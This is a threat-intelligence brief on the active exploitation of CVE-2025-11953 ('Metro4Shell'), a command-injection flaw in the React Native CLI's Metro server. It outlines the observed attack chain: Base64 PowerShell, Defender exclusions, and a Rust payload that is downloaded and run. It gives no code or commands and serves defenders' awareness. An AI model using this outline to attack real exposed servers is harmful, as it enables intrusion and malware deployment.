Key Findings

• Threat actors have been observed exploiting a critical security flaw, CVE-2025-11953, impacting the Metro Development Server in the popular "@react-native-community/cli" npm package.

• The vulnerability, also known as "Metro4Shell," allows remote unauthenticated attackers to execute arbitrary operating system commands on the underlying host.

• VulnCheck, a cybersecurity company, first observed the exploitation of this flaw on December 21, 2025, with a CVSS score of 9.8.

• Despite the active exploitation, the activity has yet to see broad public acknowledgment, and the EPSS (Exploitation Prediction Score System) continues to assign a low exploitation probability of 0.00405.

Background

The Metro Development Server, which is opened by the React Native Community CLI, binds to external interfaces by default. The server exposes an endpoint that is vulnerable to OS command injection, allowing unauthenticated network attackers to send a POST request and run arbitrary executables. On Windows, the attackers can also execute arbitrary shell commands with fully controlled arguments.

Exploitation Details

• VulnCheck observed consistent, real-world attacks against the vulnerability, with the activity continuing for weeks before broad disclosure.

• The threat actors have weaponized the flaw to deliver a Base64-encoded PowerShell script, which performs various actions, including Microsoft Defender Antivirus exclusions and the retrieval and execution of a Rust-based binary payload.

• The downloaded binary features anti-analysis checks to hinder static inspection, and the attacks have been found to originate from several IP addresses.

• VulnCheck described the activity as neither experimental nor exploratory, but rather consistent and operational, indicating that the attacks were not just proof-of-concept testing.

Implications and Recommendations

• The lack of public acknowledgment of the exploitation of CVE-2025-11953 risks leaving defenders unprepared, as exploitation often begins well before official recognition.

• The vulnerability is easy to exploit, and many exposed servers remain online, making the delay in broader awareness particularly concerning.

• VulnCheck emphasized that "CVE-2025-11953 is not remarkable because it exists. It is remarkable because it reinforces a pattern defenders continue to relearn: Development infrastructure becomes production infrastructure the moment it is reachable, regardless of intent."

Sources

• https://thehackernews.com/2026/02/hackers-exploit-metro4shell-rce-flaw-in.html

• https://securityaffairs.com/187587/hacking/hackers-abused-react-native-cli-flaw-to-deploy-rust-malware-before-public-disclosure.html

• https://takedowncyber.com/news/hackers-exploit-react-native-cli-flaw-to-deploy-rust-malware-before-public-disclosure